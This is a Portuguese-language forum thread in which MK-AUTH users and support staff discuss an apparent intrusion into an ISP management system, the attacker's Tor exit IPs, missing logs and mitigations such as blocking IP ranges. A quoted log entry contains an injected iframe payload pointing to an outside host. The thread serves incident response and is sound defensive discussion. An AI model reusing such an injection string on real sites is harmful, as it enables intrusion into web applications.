Hoje pela manha percebi que os log's na pagina principal estava sem log, como se alguém tivesse apagado, porem conforme print anexo essa possível invasão não foi bem sucedida pois deixaram rastro, por favor, mas alguém já passou por essa experiência consegue indicar alguns comando para verificar se não comprometeram o sistema?
Conforme os log's alguém pode dar uma força para evitar esse tipo de acesso? Ou corrigir essa falha?
Versão do MK 21.01 K3.1
IP que usaram: 185.220.101.211
Conforme whois a empresa dona desse bloco e : CIA TRIAD SECURITY LLC é usado por saída TOR
Respostas
Bom dia prezado(a),
Faz o seguinte:
Obs.: Faz o bloqueio dos IPs 185.220.101.*, no seu Mikrotik.
Qualquer dúvida, estamos à disposição.
Atenciosamente,
Equipe MK-AUTH
Olá, obrigado, vou fazer essa ação conforme orientação e retorno com um feedback.
Quando ao bloqueio para esse IP foi feito sim, porem como estão usando saída TOR esse IP se renova.
Deixa eu fazer uma outra pergunta, olhando o print " Tela com log de invasao.PNG" esse acesso foi feito de que forma?
Feito conforme procedimento, no 1º momento os log's retornaram ei consegui verificar os acesso indevidos:
27880608 Saiu do sistema - IP:185.220.101.211 28/04/2021 07:36:44 <iframe src="http://5.135.98.26/i.php?@45.179.53.5">
Tem varias tentativas de acessos para o endereço abaixo:
OPERFALL Tentativa invalida na api, token enviado invalido - IP:190.95.225.92 28/04/2021 00:45:59 mk-bot
Detalhe, passou +- 20 mim com o ERP com acesso externo e os log's sumiram...
Estamos operando com o Mkauth local desabilitamos acesso externo ao ERP, vou manter dessa forma.
Qual o procedimento devo fazer agora?
Segundo a tela pode ser algum bug no javascript... que está permitido carregar algum código sem verificacão de acesso.]
E na versão nova 21.01.. já tentou atualizar pra versão 21.02 e testar se o mesmo continua?
Francisco Fabio Fernandes David disse:
Estava nessa versão 21.2, fiz a atualização para a 21.02 porem não surtiu efeito...
Engraçado e que o cidadão que esta fazendo essa invasão não esta nem preocupado em apagar os log's, só nessa ultima tentativa dele e que ele excluiu...
O problema e que ele esta fazendo isso usando alguma ferramenta atrás de prox (TOR).
Até ter uma forma de corrigir isso vou deixar o Mkauth fora para a rede externa.
3waccess
é algum usuário cadastrado no sistema ? pois ele usou esse usuário 3waccess
Francisco Fabio Fernandes David disse:
Na realidade esse print voce precisa verificar o usuário que saiu do sistema com o IP 185.220.101.211, quando voce vai ver os log's voce vai ver a informação do outro print e aparece como usuario uma Hache com algumas linha de comando.
Isso e bem estranho...
na veradade ele corrompe o arquivo mostrando no print possivelmente o exploit está sendo executado por ai ..
agora depois do update em instalacão nova o problema ainda continua?
Conforme orientação do suporte do MK fizemos um backup, rodamos em uma maquina de teste e nessa maquina aplicamos uma atualização, aparentemente as informações estava todas intactas, e apos a atualização apareceu mais informações de log's que não aparecia entes, a segunda etapa foi fazer a atualização do ERP que esta em produção, ao fazer o procedimento foi o mesmo os log's estava ok porem quando colocava a ERP para acesso externo começava a tentativa de invasão.
Nesse momento estou com o ERP fora para acesso externo com a versao 21.02 e os DNS esta conforme orientação do Pedro apontada para a cloudflare, deveria ter segurança mas acredito que o MK ainda esta vulnerável.
amigo ja destrinchei o xploit todo.. ja descobri como fez tudo, ja chamei o pedro no privado para explicar até agora nada...........
-
1
-
2
-
3
de 3 Próximo